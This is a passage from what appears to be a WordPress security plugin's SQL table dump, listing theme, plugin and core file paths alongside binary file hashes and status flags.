���3�','��DX�+C�]�D�$W+�f��yi><�\\�4��','',0,'?'),('�e[�\"H�@���j�','wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�T?��^�w���','O@x�|\"�*�N=^��E<y-�<͇���','',0,'?'),('�؆���X\"5_��pP','wp-content/themes/simpleshift/parts/companion/frontpage-news.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z����V�@(��','���a2�!\n\"9B�̛�Pu!2b$q���i','',0,'?'),('�)���ŕ��+\"�V�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/htmlmixed/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u~cVp2u��2<��$','���3�&񏒹�9����(f��*��Ic��EB','',0,'?'),('���6��$�9��u�','wp-content/themes/graduate/inc/customizer/sanitize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{?����g0�+�E�w','��n���9n�(�Z�^Pۚx�Bi�a���4�3','',0,'?'),('����9�~\0{@���','wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i����oAP��=a�','9s����Z��D×e}���vu�O���','',0,'?'),('�u�t�� ��ɪ��','wp-content/plugins/wp-cerber/assets/flags/es.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݵ�*M,M\'A@��K�','�򐈄c`M�Cu��6�ם)X�%|G�W��ִ�>','',0,'?'),('�x�^ĿFX����','wp-content/themes/catch-responsive/js/catchresponsive-customizer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ݲ���[�G�Q��','�b�T�}��ڷȓR��\Z+�Z>�}s�suhw','',0,'?'),('�yP:H�<���\0����','wp-content/themes/hitmag/js/jquery.flexslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1n\0�x�!���q]��','?�ԫ��Y�\0���\\#�\"J?:�׊9R�M��','',0,'?'),('����#��%}{�','wp-content/themes/authorize/components/post/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z@���;���9΍3��','�8�����\"\n���8��k�rN��Z�M팴','',0,'?'),('���Clo�������','wp-admin/nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q�g��>h}7�%<','4��ץk-%���	k@1��Rר�r�ÛN�','',0,'?'),('�.zr\0����[3�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/haml/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ԝq>g�N���Wu�','��q�4\'�o���i1\0ܱ.�&��@�@��M	|','',0,'?'),('�s9�ӡP��kF�#��','wp-content/themes/Kent/slider.php',0,'L��Out�L�ڥU>�','L��Out�L�ڥU>�','�z��[V�8�^���aJ��&%�D�v;��	��','',0,'?'),('�l��D0,�M+�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/css/scss.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�d���^�g\'�','�ϸ����?��K��?�%b�,Cu�&�<','',0,'?'),('�˟�Z�Z�c�Hw/�','wp-content/themes/graphene/images/social/deviantart.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H~����RԱ��mq���','�z�v�>�R�`�c]q��:¦3d�\n^��f4:Z`','',0,'?'),('�&�	Y�tz(�\Z��','wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j.\\�0*���	[����','f���8��\'!�RF���L���˙^�w��','',0,'?'),('�R�|7iSΞ�(<�4','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/smarty/smarty.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��λ,�X W�:>',')L_�HIГJ��z8�r�5�r1�����V,�:','',0,'?'),('��I<���U�CMdZ�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\nA�I�g��+��.','5�N叜p�o\'�GYNsC�IS��>LJ�','',0,'?'),('��-��i>bs��1�','wp-includes/js/jquery/ui/resizable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c0�N^�l�����L��','�~��i�{Q���ԯ��֕���YdF�w\r,�Ϲ','',0,'?'),('\r�X�$�L�\'����','wp-content/themes/advance/inc/kirki/includes/class-kirki-enqueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�90�޲����>%�Hx','�²�B�/	:5�en�y�r1A�/Ң�1��','',0,'?'),('�*$��!�mG��sc','wp-content/themes/event/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}*�t̘��Tրbs','��g���~��0L�Ҁ�9�ɹ	Zo�.E','',0,'?'),('\"���Gd6�ሢde','wp-content/themes/education-hub/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�g@�Z�O��A�g','c���{��4��;.�HS�!,w�.�o�����7�','',0,'?'),('\'Y���֖�>v�ǡ','wp-content/plugins/wp-cerber/assets/flags/td.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��б�n�HБ�����','��rJ���VO>\Z~dƨn`ik\Z����\\','',0,'?'),('9�L�/gJ�)3','wp-content/plugins/wp-cerber/assets/flags/bt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�@^؟J�H;��2:','	��\'��A-��êu��rdƹ��Q����','',0,'?'),('@������4����@�:','wp-content/themes/twentytwenty/template-parts/content-cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���oh7��\\�+�','�ea::����8�Af�����J�;��Ak\n','',0,'?'),('F��%+Sl\0�tǜ�','wp-content/themes/monograph/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԍ%⌮����6�!�',')̢(��.�KҩC���\Z[j�UB����ɑ','',0,'?'),('R�mY�N�B�I���','wp-content/themes/simpleshift/assets/js/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%����5��x/���','m�G4���L��u#j��D�r(��H��','',0,'?'),('R��9�o\"�����','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/xml/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/\Z����ߡ�\'�Ou�,','��!��Ӷ�	,���8�.�\"7��(�ØwH\r�qz�','',0,'?'),('h��!��:�~̛���','wp-content/themes/advance/inc/kirki/assets/scss/controls/dashicons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#R��C8u?2T:�Gڅ','�G��\"�]icsҺ���҂�ڒ�(���','',0,'?'),('m\r�AT������','wp-content/themes/simpleshift/inc/kirki/assets/images/kirki-toolkit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l)����.���5��@','�������th}�9r��N�f��s+k����8','',0,'?'),('m��D�ڜ�(�\r���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3R��d#\r\"���%','��ݩF�s�3G����b�8������N�@��X','',0,'?'),('��4r�%����j���','wp-includes/SimplePie/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�~Hwb�x��xsٷ:�','0���sD���;��P�=�\'��2�	��\0Df��','',0,'?'),('��KS+�e׎A�@��','wp-admin/css/colors/light/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��Y�Hn	T��5^�','��Y�y�7B۩���/�c�಻�$r��&���Z','',0,'?'),('�������(���','wp-content/themes/Yegor/archive.php',0,'�.�+��)�#\Z�ߙ�','�.�+��)�#\Z�ߙ�','2@N�=�e�9�)�&�,�b$pX�#UE�','',0,'?'),('��1H*,	�^J','wp-content/themes/advance/inc/kirki/includes/scripts/class-kirki-scripts-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�=\rM��]_f���u','���ҕm���ޅL�+��\0P��}>���','',0,'?'),('�����Fe�	57[�','wp-content/plugins/wordfence/lib/email_newIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q��3岛�u�`�At','m)Th�)�\"=>�#a���Z;V<\0`�h	�5�w','',0,'?'),('����UNEA�g�t','wp-includes/js/customize-selective-refresh.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uP岉�0x\Z�����','��q�˖jZC~����<sħ+�RI!�H��','',0,'?'),('��!��|T�>���]','wp-content/themes/graphene/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5m�E~dv�Z��,�i�','�Z ��]�o�u�A\ZR���V�6:S�q$��','',0,'?'),('�A�o�!�V��ų`v','wp-content/wflogs/ips.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('�1����?bG�N�Q','wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s7ߖ|��ǖيy��','Q�!�G=���5X�A��_|�j��%\n>a�K��','',0,'?'),('�zj�8FU�~eq�$�','wp-content/themes/auberge/sidebar-front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T:/4e��U�η�','��Nm����\n�3�n�Կswt�)�M}�','',0,'?'),('����>��ULK&/(','wp-content/themes/wp-simple/assets/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P侍�E\no�)>W�','��SOǑ˲$�t$Q �Hƙ�ف���Y�,�-','',0,'?'),('��l�Uy:e4�N1ϻo','wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]/�\0��7��(r��^','8U���GS�����5���l��rx���\\)��\n','',0,'?'),('I��D�ȴl0!1�`','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�KG��75-?T�','��t4 d�$�^��f�b��KR���&c','',0,'?'),('��	0��雺yd!��','wp-content/themes/city-store/inc/customizer/functions/design-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+	ӌ�&Tx���Cm\"','�{J���\':-I�@�����@�B#ц�3���','',0,'?'),(' o��ƕ��t_��\0.�','wp-content/plugins/wordfence/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ص���k�:]����','I���p��A�B�i���7��0rME�$}�y�','',0,'?'),('\"؋�����\n��','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-preset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r:�g�,�u9{��\r4s','�d��u�D�:}��LD�pX�Le¸|���\r�','',0,'?'),('%~WN82��Q�O���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n4�F��0JC� n��k','�Cb,���\"�\">j���Ŋ��AlD�','',0,'?'),(':����3 P�x���','wp-content/themes/gildrest/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��{\Z�\'��}6<','�&�݉2⠷Q��C�3���[�;�`~�{','',0,'?'),('=��Yx9ɚ�M	\r�l�','wp-content/themes/newsmag/assets/vendors/offscreen/offscreen.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TiI��-�l�jq �K','�ZpZ��K��0�Еl���L����N�����','',0,'?'),('P�ņ�s?g��\n:�','wp-content/themes/graphene/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W&7���y%s��','������H��7E>�֦����DW*U��X','',0,'?'),('U�D6��{��碡�','wp-content/themes/wp-simple/inc/kirki/includes/output/property/class-kirki-output-property-background-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iI�I&k��q�B���C�','Y�´���(��sK�{�!��J���j0�M�m���','',0,'?'),('XNK�=%�>(�Uw','wp-content/themes/enigma/css/photobox-themes.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����U��\n���\'','m4����)�)9[�둋�.b$@[�����Q','',0,'?'),('YS�\r:�\n���~�','wp-content/themes/chronus/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l.�,BJ�c=�X@�0�m','\'m��22*�1�x�t����})�8�:X��','',0,'?'),('\\���\Z�e	�)��Up','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȑH�\Zb�>V�D��R2','rћJԑI/�\nO�Y}�x��ņ����U ','',0,'?'),('^k@.��&r�F','wp-content/themes/enigma/css/font-awesome-4.7.0/scss/_screen-reader.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�G���Uh�o�','�1�4<6�ԇ����&�V�N�㋂���ء��','',0,'?'),('_�$�?*	�Sh�+','wp-content/themes/graphene/admin/custom-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�V��Z�Zsk~g�','R�b��m�~�W���P+�t��w@l\0����H','',0,'?'),('g*�hf�H��\r&L�x','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/edit/closetag.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^(�5���:���','AC�QS),�������\Z[��nڪ�t��VE�','',0,'?'),('w���+\0���2�R','wp-includes/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zjo�\0��y,�*�}c','2p\"Wj����s�lf&S@�[�\\��\"W�','',0,'?'),('y�6��կkڇ�jd��','wp-content/themes/wp-simple/inc/kirki/kirki/includes/output/property/class-kirki-output-property-font-family.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7(�����D�� q','R&��!���W�. �CPB&ܷm\"D���5�yPM','',0,'?'),('��5Y����-��Q9','wp-content/themes/authorize/assets/stylesheets/font-awesome/scss/_fixed-width.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�id�4ԙ�6���','R`��;�sR6F�[�#���|#쨧������','',0,'?'),('��4��t!��BŌ��,','wp-content/plugins/wordfence/js/wfglobal.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0>q� �	^�&�4r�&','���V�\"��_���+�J\0��_���>�J�','',0,'?'),('�o5���,]j��N<�','wp-content/themes/edge/js/source/edge-main.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/|d\'!���ձ�+�','�_�C!�\Z�R�#��|}dfF���?s�V@','',0,'?'),('��� R��\'�\r��X','wp-content/themes/Endolf/footer.php',0,'WK�1t�\"3�L��','WK�1t�\"3�L��','��5��O_q�����P��W�[%!`@SQ����','',0,'?'),('�-��B��|tS^�','wp-includes/customize/class-wp-customize-nav-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ԡ�P�\n}�$','�vG~?t7\0��h�R,��|�]9��p�.J�w','',0,'?'),('�ECW��`�`��-�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_@�e���3�b��B','�L�ؤ@J�9OhG�@@��Z!��\08#l�(','',0,'?'),('���\"�����(T','wp-content/themes/graduate/assets/uploads/icon-quote-left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<��< �be�����k�','�\nU\"���i\n�K~�����o>�N��','',0,'?'),('�t��d!b΢��ɪ�','wp-content/plugins/wp-cerber/assets/flags/tv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JP��ށ��߼J�','۽����ɇR�ZN��P����bX�c9h;��','',0,'?'),('�Ny*$k���q܂|i','wp-content/themes/authorize/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>�合���ư�r�','o*�\n��+�\n�P�<�p�F���2���i\Z�,','',0,'?'),('΢�S˪�\n��B�V\"','wp-includes/fonts/dashicons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�3$_�n��5��X',';ʐ\'8�4aOoY8-U�62���K�qq�$B�x','',0,'?'),('�2�%�a����sԨ','wp-content/themes/graduate/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�d���\0��)q���','��G�(�6��ח��xF�B��4�,\n�(o�Y*�','',0,'?'),('��\\��h\Z��)Ġ�','wp-includes/blocks/paragraph/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�T;��_Bjf�����','�Ƈ4pc���[<3iԁv�D������How<','',0,'?'),('�*Q.	�-c�%�D','wp-content/plugins/wordfence/lib/flags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��c�磭��c�-','8�Y��CO���0�j{�\Zx��D�Ė��x�O�','',0,'?'),('���m��RHt�ݤ','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/colorforth.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1۱��[�~u��','�6@����a�����J[�\n_b�M�','',0,'?'),('��dJ��ri�4O�p�','wp-content/themes/Endolf/FT/license-html.php',0,'��� �,��ۓ��X��H','��� �,��ۓ��X��H','����Y��XjМ�������%,�]���&k��','',0,'?'),('���	~=^��STz','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/edit/trailingspace.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e	[x�Ef�o�@�','����H�!l^����f��Ce��','',0,'?'),('��ܡ9�u_\\\n�9�\'','wp-admin/css/color-picker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���x��Ti6���','ۣq��T��zu���Oi�\\�5ЯY�u��~=c','',0,'?'),('�KU�g0MU�/��ʇ','wp-admin/admin-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xo��_���Բ)\n��r','�(�Z!.�e��TU92;�����ݏt5o�^','',0,'?'),('\Z[�`��0CI$T��\'�','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�H��$I�3��^0','Dsmr?v�jz����Mo�3=b0���K�R#','',0,'?'),('4;V��\'�/����f�','wp-includes/js/jquery/ui/effect-scale.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KaJ�d���J\'^','_��q�x#�_�\0��<�J�c��~�ұ�ǫ','',0,'?'),('7���OW\n@�a','wp-admin/css/colors/modern/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&D��	�?G*��c��','�����w����V�e��am��x��Z�}\"6B','',0,'?'),(':5�\0��ڮ����r�0','wp-content/themes/enigma/wpml-config.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g�뗇����f�','� ʯ�N��:�m0\Z?�e���ݤCQ�B','',0,'?'),(':�f�?bj���.���','wp-content/plugins/wordfence/views/blocking/block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j?G\\��g��2.&`�p9','F��	��!�\ZB�q�ecC�u�]��P\0ŀ�;�','',0,'?'),(';�{���k���s��','wp-content/themes/twentytwenty/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~gfDA��K��.��M','��h��ڮ�n�?��U��`/3ܙ=�^��','',0,'?'),('=q��u�iGǩ�)','wp-content/themes/enigma/css/font-awesome-4.7.0/less/fixed-width.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�\0�!�\'��T(�','j&�R�A�uF͏����4�h`��_\0�!�','',0,'?'),('@TUb.}H\\g/�V','wp-content/themes/wp-simple/parts/error-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U#\0�&8HL�u:�;�','w�t�v{����h�+�Ÿ.u���S�TI�b�','',0,'?'),('Rk��N9�,a|��6�','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/vendors/selectize/selectize.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YI����U���9��','�o1�_��fx�ߖ���B�7�<��jdRL�z,','',0,'?'),('T�Ę5VH���P{��','wp-includes/Requests/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\0��3�\Z�RI','-@��g %�����uON\\}@l���f\'���','',0,'?'),('V������*	&>XV','wp-content/themes/weblog/acmethemes/sidebar-widget/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5vpf�i�<�\\�\r��','��g�\'��l�V3j���)��\"��`�Z��','',0,'?'),('Wr�S�Y�cE�X?9�','wp-content/themes/advance/inc/images/ico-delete.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hF�|�Ưxdg_+','~qz4���E��=��G<����c yA���UG�','',0,'?'),('a\'��-�1I�t','wp-content/themes/lovecraft/widgets/recent-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�7�gBDɒ����','�w�\0���ܱ��	�� �29�U�KbJ�[fs\'B','',0,'?'),('bsLkC�����q߻','wp-content/themes/singularity/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�a?���P�NQ+��','_K�������\"UE��6���:#�$8��','',0,'?'),('e���1�Y��m\0','wp-content/themes/graphene/admin/options-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۛ��˪��uD��ޔ','�y�2�68Q�U��yr7�%����3븺�','',0,'?'),('p+Z	�2r��w.D�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/dialog/dialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4)�(jˑ�K�43%','R)��!��~�t���R��&iC���Z���','',0,'?'),('q�Z��瓍��>�!','wp-content/themes/hitmag/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xۖ7G�I�s��\0','ލ�	�\n��ZIۃy�(�?�\\���gz[E�L�','',0,'?'),('~�͕��+`�M��e6S','wp-content/themes/graphene/js/codemirror/codemirror.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w������|F�',')N�?��s�\nʙ��VB��4Ah���>g�g','',0,'?'),('���n?��4��p#-','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-color-alpha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�FbE�O�R(V�k��Q','RPB�6W\Z\n���t�\"l�1��]�L�\ZZ9i�o','',0,'?'),('��jo����8D��k','wp-content/plugins/wp-cerber/assets/flags/tz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�0���1�_NM','��_i`K�@D4���=�Z�2QcuY!z�=����','',0,'?'),('��q��YG�%����B','wp-content/themes/twentytwentyone/assets/sass/02-tools/mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UM��	0��;^=M','���،�@C�B+��=\Z���������','',0,'?'),('���C\n���U���','wp-admin/js/custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݎ�\Z���\Zڸ���','��v�N����;d�V��5d���t�,�','',0,'?'),('�n��O.���}','wp-content/themes/twentytwenty/templates/template-cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�R��w�O��,�|�','��\r���:�{Yh��\0�o\ni#�uޡh�s���tr','',0,'?'),('��0l��j�0+%�','wp-includes/SimplePie/Source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��A:�$]B-�vw�)','�\"���9M�a���U�_�h�I��>�,]�C�','',0,'?'),('�� ՗�V�h���','wp-content/themes/advance/layout/part-layout2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@O��>͒z\nc','/:�VA\n 2�\\���,�C���7�1��Dt!NY|ֶ','',0,'?'),('�F��(< ���p�)','wp-content/themes/Yegor/content-single.php',0,'��bZ��!�<R4�','��bZ��!�<R4�','�k�⥖n\Z��C�������bI�<�F��\\C��','',0,'?'),('�\0@ض&W��z','wp-content/themes/hitmag/inc/kirki/assets/js/controls/color-palette.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��\0�]��\r�uǛ','�E&�VM��>(O��?H-�/#biCB�W','',0,'?'),('�(�L]%���ub��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/display/panel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�U�C��[���͍','��F�[Ho�f/�Gv�V�*u��7�L/���i��','',0,'?'),('��iĢ���>O�\0�u','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K.���\0KL�5�=','�h\Z_���Х_<��r�+j\\���; ��','',0,'?'),('�g�u4���Mn�','wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-add_field.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�G=��\ZV�\r��','8B� ���vdutNy��;\\�%[�!�#','',0,'?'),('�Ȝ�\r�N��-�Z','wp-content/themes/Endolf/css/custom.php',0,'��ΉԻ����!�}�','��ΉԻ����!�}�','a_��S~�L�6���m\0ަ�i�m\"���s�','',0,'?'),('���窒�u��\rZJW+','wp-content/plugins/wordfence/images/help.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$N�;\'��M��� Y','���\Z�7\0��r€/i��z;ki,�=L�Z�g���','',0,'?'),('�)����t\r�,�Jڼ','wp-admin/options-permalink.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�\0�+���qQ=�m','Wsf.̢)\nP��_(�%�Z|��EV�t\rx��','',0,'?'),(']Xv��Lڐ� �','wp-content/themes/singularity/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,��M���fLo�','�\"��?uh���\0a�\\��~W�\"^�-|�','',0,'?'),('iyN��	�Kl_|�','wp-content/themes/weblog/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0IY�ᬫ�S��T?�','�qW���d�K�ġ��3�W��본��vx','',0,'?'),('�?DŽ����:\n��X','wp-includes/customize/class-wp-customize-theme-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�K���WTՂ�c�','�&�^��J�eFX*i-t��;��8��t�\0O��','',0,'?'),('��g�<)��t.F��','wp-content/plugins/wp-cerber/assets/flags/aw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�g�qAŎ�RAj�?&v','J	�M��wPs���0)n����F����b��','',0,'?'),('\Z��) �%iy�δ','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}+#z,��e�rEJ-','sf��q@��8�!yW�&ڔA�+/�uY���44�G','',0,'?'),('\Z�K��a�2Sc��kI','wp-content/plugins/wp-cerber/assets/flags/za.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	֨���˅hq�d�','s��Δ��֫V��`��`�R	;��cϯ���','',0,'?'),('&Щ41t�x%Ĉ\\','wp-content/themes/auberge/template-parts/loop-banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�W\\�z��m�\Z','�2�0��GY��4�<�M�j�\n\Zy<�r9','',0,'?'),('3�d����yj�����V','wp-content/plugins/wordfence/lib/menu_firewall_blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��fݎ;��#T��','�>�:�T���O��;���w_S�ݯ��&','',0,'?'),('M�:��8䖹�O�q�','wp-content/themes/monograph/inc/plugin-enhancements.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�M?�;ik���) ','�tğ�ɕ�g���,́7��2�f��Y��/�QV','',0,'?'),('Q�+h��]CM0CM�','wp-content/themes/monograph/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n^����}Hb','\n�=�~�Q�{!��1�P�Zaה��Ư�ͦ��','',0,'?'),('Wl��y:�\0Vn`�d\0�','wp-includes/js/tinymce/plugins/wpview/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&���\rb���!���',',�`i�t���ڎ�Tm��l��k�s�\r=','',0,'?'),('X��r�����\"^}��','wp-content/themes/hitmag/css/magnific-popup.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0���vre����\n�`�','�X�;��Ɛ��